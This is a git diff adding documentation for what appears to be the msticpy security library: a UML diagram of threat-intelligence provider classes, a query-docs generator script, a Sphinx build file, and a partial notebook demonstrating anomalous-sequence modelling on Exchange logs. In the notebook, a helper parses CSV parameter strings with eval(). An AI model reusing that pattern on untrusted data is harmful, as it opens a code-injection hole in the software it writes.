Binary files /dev/null and b/docs/diagrams/TIProvider.png differ
diff --git a/docs/diagrams/TIProvider.pyns b/docs/diagrams/TIProvider.pyns
new file mode 100644
index 000000000..18c521037
--- /dev/null
+++ b/docs/diagrams/TIProvider.pyns
@@ -0,0 +1,35 @@
+# PynSource Version 1.2
+{'type':'meta', 'info1':'Lorem ipsum dolor sit amet, consectetur adipiscing elit is latin. Comments are saved.'}
+{'type':'umlshape', 'id':'TILookup', 'x':90, 'y':10, 'width':170, 'height':314, 'attrs': 'available_providers|_providers|provider_status|loaded_providers|_providers_to_load|_secondary_providers|configured_providers|_all_providers', 'meths': 'provider_usage|reload_providers|lookup_iocs|_select_providers|lookup_ioc|_load_providers|add_provider|__init__'}
+{'type':'umlshape', 'id':'_OTXParams', 'x':917, 'y':1086, 'width':162, 'height':90, 'attrs': 'headers', 'meths': '__attrs_post_init__'}
+{'type':'umlshape', 'id':'OTX', 'x':912, 'y':833, 'width':170, 'height':154, 'attrs': '_IOC_QUERIES|_BASE_URL|require_url_encoding|_REQUIRED_PARAMS', 'meths': 'parse_results|__init__'}
+{'type':'umlshape', 'id':'HttpProvider', 'x':555, 'y':499, 'width':146, 'height':138, 'attrs': '_httpx_client|_request_params|_BASE_URL', 'meths': '_substitute_parms|__init__'}
+{'type':'umlshape', 'id':'IoCLookupParams', 'x':752, 'y':1005, 'width':160, 'height':28, 'attrs': '', 'meths': ''}
+{'type':'umlshape', 'id':'AzSTI', 'x':199, 'y':816, 'width':114, 'height':90, 'attrs': '_IOC_QUERIES', 'meths': 'parse_results'}
+{'type':'umlshape', 'id':'KqlTIProvider', 'x':247, 'y':498, 'width':186, 'height':154, 'attrs': '_query_provider|_CONNECT_STR', 'meths': '__init__|_create_query_provider|_get_query_and_params|lookup_iocs'}
+{'type':'umlshape', 'id':'TIProvider', 'x':549, 'y':187, 'width':170, 'height':170, 'attrs': 'supported_types|require_url_encoding|_supported_types', 'meths': 'is_supported_type|lookup_iocs|_check_ioc_type|__init__'}
+{'type':'umlshape', 'id':'_XForceParams', 'x':614, 'y':1084, 'width':162, 'height':106, 'attrs': 'auth_str|auth_type', 'meths': '__attrs_post_init__'}
+{'type':'umlshape', 'id':'XForce', 'x':627, 'y':834, 'width':138, 'height':122, 'attrs': '_IOC_QUERIES|_BASE_URL|_REQUIRED_PARAMS', 'meths': 'parse_results'}
+{'type':'umlshape', 'id':'OPR', 'x':1207, 'y':833, 'width':170, 'height':218, 'attrs': '_IOC_QUERIES|_BASE_URL|_REQUIRED_PARAMS|_provider_name', 'meths': 'lookup_iocs|_lookup_batch|_parse_multi_results|parse_results|_lookup_bulk_request|__init__'}
+{'type':'umlshape', 'id':'TISeverity', 'x':1384, 'y':256, 'width':110, 'height':154, 'attrs': 'information|high|warning|unknown', 'meths': '__eq__|__gt__'}
+{'type':'umlshape', 'id':'LookupResult', 'x':1138, 'y':137, 'width':130, 'height':282, 'attrs': 'ioc|ioc_type|query_subtype|provider|result|severity|details|raw_result|reference|status|summary|raw_result_fmtd|severity_name', 'meths': 'set_severity'}
+{'type':'umlshape', 'id':'TILookupStatus', 'x':1377, 'y':88, 'width':150, 'height':128, 'attrs': 'not_supported|ok|bad_format|query_failed|other', 'meths': ''}
+{'type':'umlshape', 'id':'Tor', 'x':854, 'y':495, 'width':114, 'height':154, 'attrs': '_last_cached|_cache_lock|_BASE_URL', 'meths': 'parse_results|lookup_ioc|__init__'}
+{'type':'umlshape', 'id':'VirusTotal', 'x':440, 'y':836, 'width':138, 'height':138, 'attrs': '_IOC_QUERIES|_BASE_URL|_REQUIRED_PARAMS|_PARAMS', 'meths': 'parse_results'}
+{'type':'comment', 'id':'C7998', 'x':315, 'y':156, 'width':200, 'height':32, 'comment': 'TG9hZCBwcm92aWRlcnM='}
+{'type':'edge', 'id':'OTX_to_HttpProvider', 'source':'OTX', 'target':'HttpProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'_OTXParams_to_IoCLookupParams', 'source':'_OTXParams', 'target':'IoCLookupParams', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'AzSTI_to_KqlTIProvider', 'source':'AzSTI', 'target':'KqlTIProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'HttpProvider_to_TIProvider', 'source':'HttpProvider', 'target':'TIProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'_XForceParams_to_IoCLookupParams', 'source':'_XForceParams', 'target':'IoCLookupParams', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'XForce_to_HttpProvider', 'source':'XForce', 'target':'HttpProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'KqlTIProvider_to_TIProvider', 'source':'KqlTIProvider', 'target':'TIProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'OPR_to_HttpProvider', 'source':'OPR', 'target':'HttpProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'Tor_to_TIProvider', 'source':'Tor', 'target':'TIProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'VirusTotal_to_HttpProvider', 'source':'VirusTotal', 'target':'HttpProvider', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'_XForceParams_to_XForce', 'source':'_XForceParams', 'target':'XForce', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'_OTXParams_to_OTX', 'source':'_OTXParams', 'target':'OTX', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'TISeverity_to_LookupResult', 'source':'TISeverity', 'target':'LookupResult', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'TILookupStatus_to_LookupResult', 'source':'TILookupStatus', 'target':'LookupResult', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'TIProvider_to_TILookup', 'source':'TIProvider', 'target':'TILookup', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'LookupResult_to_TIProvider', 'source':'LookupResult', 'target':'TIProvider', 'uml_edge_type': 'association'}
diff --git a/docs/generate_query_docs.py b/docs/generate_query_docs.py
new file mode 100644
index 000000000..e3076da9b
--- /dev/null
+++ b/docs/generate_query_docs.py
@@ -0,0 +1,136 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Generate documentation of current queries."""
+import argparse
+from pathlib import Path
+
+import pandas as pd
+from tabulate import tabulate  # type: ignore
+import tqdm
+
+from msticpy.data import QueryProvider
+
+__author__ = "Ian Hellen"
+
+
+PROVIDERS = {
+    "MSSentinel": "Microsoft Sentinel",
+    "M365D": "Microsoft 365 Defender",
+    "Kusto": "Kusto/Azure Data Explorer",
+    "SecurityGraph": "Microsoft Graph",
+    "Splunk": "Splunk",
+    "ResourceGraph": "Azure Resource Graph",
+    "Sumologic": "Sumologic",
+    "LocalData": "Local Data",
+}
+
+_DEF_DOCNAME = "source/data_acquisition/DataQueries.rst"
+
+
+def get_query_list():
+    """Return the query list as a DataFrame."""
+    prov_list = QueryProvider.list_data_environments()
+
+    print("Generating documentation for for the following providers")
+    print(", ".join(list(PROVIDERS)))
+    print("Skipping the following providers")
+    print(", ".join(list(set(prov_list) - set(PROVIDERS))))
+    env_providers = {prov: QueryProvider(prov) for prov in tqdm.tqdm(PROVIDERS)}
+
+    query_series = []
+    for env, env_queries in env_providers.items():
+        query_names = env_queries.list_queries()
+        for query_name in query_names:
+            q_group, q_name = query_name.split(".")
+            qry = env_queries.query_store.get_query(q_group + "." + q_name)
+            if "table" in qry.default_params:
+                q_table = qry.default_params["table"].get("default", "na").split()[0]
+            elif "table" in qry.required_params:
+                q_table = qry.required_params["table"].get("default", "na").split()[0]
+            else:
+                q_table = "-"
+            q_dict = {
+                "Environment": env,
+                "QueryGroup": q_group,
+                "Query": q_name,
+                "Description": qry.description,
+                "Req-Params": ", ".join(
+                    sorted(
+                        [
+                            f"{param} ({p_data.get('type')})"
+                            for param, p_data in qry.required_params.items()
+                        ]
+                    )
+                ),
+                # "OtherParams": ", ".join([f"{param}" for param in qry.default_params]),
+                "Table": q_table,
+            }
+            query_series.append(pd.Series(q_dict))
+    print()
+    return pd.DataFrame(query_series).sort_values(
+        ["Environment", "QueryGroup", "Query"]
+    )
+
+
+def generate_document(query_df):  # sourcery skip: identity-comprehension
+    """Generate query list document."""
+    doc_lines = [
+        "Data Queries Reference",
+        "=" * len("Data Queries Reference"),
+        "",
+        "",
+    ]
+
+    # This line fails if re-written as dict(query_df.groupby("Environment"))
+    # pylint: disable=unnecessary-comprehension
+    group_dict = {name: group for name, group in query_df.groupby("Environment")}
+    for name, friendly_name in PROVIDERS.items():
+        if name not in group_dict:
+            continue
+        grp = group_dict[name]
+        doc_lines.append(f"Queries for {friendly_name}")
+        doc_lines.append("-" * len(f"Queries for {friendly_name}"))
+        doc_lines.append(f"\nData Environment identifier: {name}\n")
+        tbl_txt = tabulate(
+            grp.drop(columns="Environment"),
+            headers="keys",
+            showindex="never",
+            tablefmt="rst",
+        )
+        tbl_txt = [line.strip() for line in tbl_txt.split("\n")]
+        doc_lines.extend(tbl_txt)
+        doc_lines.append("\n\n")
+    return "\n".join(doc_lines)
+
+
+def _add_script_args():
+    """Create argparse arguments."""
+    parser = argparse.ArgumentParser(description="Queries list document generator.")
+    parser.add_argument(
+        "cmd",
+        default="print",
+        type=str,
+        choices=["print", "doc"],
+    )
+    parser.add_argument(
+        "--file",
+        "-f",
+        default=_DEF_DOCNAME,
+        help="Path to RST document file to write.",
+    )
+    return parser
+
+
+# pylint: disable=invalid-name
+if __name__ == "__main__":
+    arg_parser = _add_script_args()
+    args = arg_parser.parse_args()
+
+    doc = generate_document(get_query_list())
+    if args.cmd == "print":
+        print(doc)
+    else:
+        Path(args.file).write_text(doc, encoding="utf-8")
diff --git a/docs/make.bat b/docs/make.bat
new file mode 100644
index 000000000..3c04ce0b9
--- /dev/null
+++ b/docs/make.bat
@@ -0,0 +1,47 @@
+REM @ECHO OFF
+
+pushd %~dp0
+
+REM Command file for Sphinx documentation
+
+if "%SPHINXBUILD%" == "" (
+	set SPHINXBUILD=sphinx-build
+)
+set SOURCEDIR=source
+set BUILDDIR=build
+
+if /I "%SPHINX_NOGEN%" NEQ "" goto no_gen_files
+REM Generate API source RST files
+echo Regenerating API source files...
+sphinx-apidoc --o %SOURCEDIR%/api --force ../msticpy
+del %SOURCEDIR%\api\modules.rst
+
+REM generate query list
+echo Generating query list documentation
+python -m generate_query_docs doc --file source\data_acquisition\DataQueries.rst
+
+:no_gen_files
+
+if "%1" == "" goto help
+
+%SPHINXBUILD% >NUL 2>NUL
+if errorlevel 9009 (
+	echo.
+	echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
+	echo.installed, then set the SPHINXBUILD environment variable to point
+	echo.to the full path of the 'sphinx-build' executable. Alternatively you
+	echo.may add the Sphinx directory to PATH.
+	echo.
+	echo.If you don't have Sphinx installed, grab it from
+	echo.http://sphinx-doc.org/
+	exit /b 1
+)
+
+%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
+goto end
+
+:help
+%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
+
+:end
+popd
diff --git a/docs/notebooks/AnomalousSequence.ipynb b/docs/notebooks/AnomalousSequence.ipynb
new file mode 100644
index 000000000..0a71dfcea
--- /dev/null
+++ b/docs/notebooks/AnomalousSequence.ipynb
@@ -0,0 +1,4563 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Table of Contents\n",
+    "* [msticpy - anomalous_sequence](#msticpy)\n",
+    "* [Sessions explained](#create_sessions)\n",
+    "    * [Create sessions using msticpy](#msticpy_ses)\n",
+    "        * [Using the sessionize_data function](#sessionize_data)\n",
+    "* [Explain the modelling approach](#explain_model)\n",
+    "    * [Using the score_sessions function](#model_function)\n",
+    "    * [Advanced: access Model class directly](#model_class)\n",
+    "* [Visualise the modelled sessions](#visualize_function)\n",
+    "    * [Using the visualise_scored_sessions function](#visualize_function)\n",
+    "* [Model and visualise sessions in one go](#score_and_visualise_sessions)\n",
+    "    * [Using the score_and_visualise_sessions function](#score_and_visualise_sessions)\n",
+    "* [Sessionize other log types using KQL](#other_sessions)\n",
+    "    * [Authenticate Log Analytics](#la_auth) \n",
+    "    * [Office Activity Logs](#office_sessions)\n",
+    "        * [Sessionize using KQL](#office_sessions)\n",
+    "        * [Convert sessions into an allowed format for the modelling](#clean_exchange)\n",
+    "    * [AWS Cloud Trail Logs](#aws_sessions)\n",
+    "        * [Sessionize using KQL](#aws_sessions)\n",
+    "        * [Convert sessions into an allowed format for the modelling](#clean_aws)\n",
+    "    * [VM Process Logs](#vm_sessions)\n",
+    "        * [Sessionize using KQL](#vm_sessions)\n",
+    "        * [Convert sessions into an allowed format for the modelling](#clean_vm)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# msticpy - anomalous_sequence subpackage <a id='msticpy'></a>\n",
+    "\n",
+    "Various types of security logs can be broken up into sessions/sequences where each session can be thought of as an ordered sequence of events. It can be useful to model these sessions in order to understand what the usual activity is like so that we can highlight anomalous sequences of events.\n",
+    "\n",
+    "A new subpackage called anomalous_sequence has been released to [msticpy](https://github.com/microsoft/msticpy/tree/master/msticpy/analysis/anomalous_sequence) recently. This library allows the user to sessionize, model and visualize their data via a high level interface.\n",
+    "\n",
+    "This notebook demonstrates the sessionizing, modelling and visualisation on some Office Exchange Admin logs from one of our demo tenants. However there is a section at the end which demonstrates how some other log types can be sessionized as well.  "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "env: KQLMAGIC_LOAD_MODE=silent\n",
+      "finished the imports\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "from msticpy.nbtools.utility import check_py_version\n",
+    "\n",
+    "MIN_REQ_PYTHON = (3, 6)\n",
+    "check_py_version(MIN_REQ_PYTHON)\n",
+    "\n",
+    "from typing import List, Dict, Union\n",
+    "\n",
+    "# setting pandas display options for dataframe\n",
+    "import pandas as pd\n",
+    "pd.set_option(\"display.max_rows\", 100)\n",
+    "pd.set_option(\"display.max_columns\", 50)\n",
+    "pd.set_option(\"display.max_colwidth\", 100)\n",
+    "\n",
+    "# msticpy imports\n",
+    "from msticpy.analysis.anomalous_sequence import sessionize\n",
+    "from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd\n",
+    "from msticpy.analysis.anomalous_sequence import anomalous\n",
+    "from msticpy.analysis.anomalous_sequence.model import Model\n",
+    "from msticpy.data import QueryProvider\n",
+    "from msticpy.nbtools.wsconfig import WorkspaceConfig\n",
+    "\n",
+    "%env KQLMAGIC_LOAD_MODE=silent\n",
+    "\n",
+    "print('finished the imports')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# What is a Session? <a id='create_sessions'></a>\n",
+    "\n",
+    "<b>In this context, a session is an ordered sequence of events/commands. The anomalous_sequence subpackage can handle 3 different formats for each of the sessions:</b>\n",
+    "\n",
+    "1. sequence of just events/commands.\\\n",
+    "e.g. \\[\"Set-User\", \"Set-Mailbox\"\\] <br/><br/>\n",
+    "2. sequence of events/commands with accompanying parameters.\\\n",
+    "\\[Cmd(name=\"Set-User\", params=\\{\"Identity', \"Force\"\\}), Cmd(name=\"Set-Mailbox\", params=\\{\"Identity\", \"AuditEnabled\"\\})\\] <br/><br/>     \n",
+    "3. sequence of events/commands with accompanying parameters and their corresponding values.\\\n",
+    "\\[Cmd(name=\"Set-User\", params=\\{\"Identity\": \"blahblah\", \"Force\": 'true'\\}), Cmd(name=\"Set-Mailbox\", params=\\{\"Identity\": \"blahblah\", \"AuditEnabled\": \"false\"\\})\\]\n",
+    "\n",
+    "The Cmd datatype can be accessed from <i>msticpy.analysis.anomalous_sequence.utils.data_structures</i>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Use the sessionize module from msticpy <a id='msticpy_ses'></a>\n",
+    "\n",
+    "In this section, we demonstrate how you can use msticpy to create sessions from your data. \n",
+    "\n",
+    "We read in some office exchange events from one of our demo tenants as a csv."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "exchange = pd.read_csv('data/demo_exchange_data.csv')"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>Operation</th>\n",
+       "      <th>Parameters</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\6490d00c-7ba1-42cf-a...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2020-04-18T04:50:31Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\ba36f0a4-6d73-4ba4-9...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\5fd0c4ff-1cd7-4bf6-8...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\b2915792-0396-4abe-9...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\83a057fb-dbca-4ba8-b...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          TimeGenerated UserId ClientIP                    Operation  \\\n",
+       "0  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "1  2020-04-18T04:50:31Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "2  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "3  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "4  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "\n",
+       "                                                                                            Parameters  \n",
+       "0  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\6490d00c-7ba1-42cf-a...  \n",
+       "1  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\ba36f0a4-6d73-4ba4-9...  \n",
+       "2  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\5fd0c4ff-1cd7-4bf6-8...  \n",
+       "3  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\b2915792-0396-4abe-9...  \n",
+       "4  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\83a057fb-dbca-4ba8-b...  "
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "exchange.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## If you are only interested in modelling the commands (without the accompanying parameters), then you could skip the next three cells and go straight to the [sessionizing](#sessionize_data).\n",
+    "\n",
+    "The reason for this is because each session is allowed to be either a list of strings, or a list of the Cmd datatype. The \"Operation\" column is a string already.\n",
+    "\n",
+    "However, if you are interested in including the parameters (and possibly the values), then you need the next two cells. \n",
+    "\n",
+    "We need to define a custom cleaning function which will combine the \"Operation\" and \"Parameters\" columns and convert them into one of the [allowed types](#create_sessions). This cleaning function is specific to the format of the exchange demo data which we have read in. Therefore, you may need to tweak it before you can use it on other data sets."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's define a helper function for creating columns which have the Cmd datatype\n",
+    "\n",
+    "def clean_exchange_params(operation: str, parameters: Union[str, Dict], include_vals: bool):\n",
+    "    params = parameters\n",
+    "    if isinstance(parameters, str):\n",
+    "        params = eval(params)\n",
+    "    new = dict()\n",
+    "    for dic in params:\n",
+    "        new[dic['Name']] = dic['Value']\n",
+    "    if include_vals:\n",
+    "        return Cmd(name=operation, params=new)\n",
+    "    return Cmd(name=operation, params=set(new.keys()))  \n",
+    "        "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# let's apply the helper function we defined to create columns which have the Cmd datatype\n",
+    "\n",
+    "exchange['cmd_param'] = exchange.\\\n",
+    "    apply(lambda x: \n",
+    "          clean_exchange_params(operation=x['Operation'], parameters=x['Parameters'], include_vals=False), axis=1)\n",
+    "\n",
+    "exchange['cmd_param_val'] = exchange.\\\n",
+    "    apply(lambda x: \n",
+    "          clean_exchange_params(operation=x['Operation'], parameters=x['Parameters'], include_vals=True), axis=1)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>ClientIP</th>\n",
+       "      <th>Operation</th>\n",
+       "      <th>Parameters</th>\n",
+       "      <th>cmd_param</th>\n",
+       "      <th>cmd_param_val</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\6490d00c-7ba1-42cf-a...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\6490d0...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2020-04-18T04:50:31Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\ba36f0a4-6d73-4ba4-9...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\ba36f0...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\5fd0c4ff-1cd7-4bf6-8...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\5fd0c4...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\b2915792-0396-4abe-9...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\b29157...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2020-04-18T04:50:30Z</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>Set-ConditionalAccessPolicy</td>\n",
+       "      <td>[\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\83a057fb-dbca-4ba8-b...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...</td>\n",
+       "      <td>Cmd(name='Set-ConditionalAccessPolicy', params={'Identity': 'seccxpninja.onmicrosoft.com\\\\83a057...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          TimeGenerated UserId ClientIP                    Operation  \\\n",
+       "0  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "1  2020-04-18T04:50:31Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "2  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "3  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "4  2020-04-18T04:50:30Z    NaN      NaN  Set-ConditionalAccessPolicy   \n",
+       "\n",
+       "                                                                                            Parameters  \\\n",
+       "0  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\6490d00c-7ba1-42cf-a...   \n",
+       "1  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\ba36f0a4-6d73-4ba4-9...   \n",
+       "2  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\5fd0c4ff-1cd7-4bf6-8...   \n",
+       "3  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\b2915792-0396-4abe-9...   \n",
+       "4  [\\n  {\\n    \"Name\": \"Identity\",\\n    \"Value\": \"seccxpninja.onmicrosoft.com\\\\83a057fb-dbca-4ba8-b...   \n",
+       "\n",
+       "                                                                                             cmd_param  \\\n",
+       "0  Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...   \n",
+       "1  Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...   \n",
+       "2  Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...   \n",
+       "3  Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString...   \n",
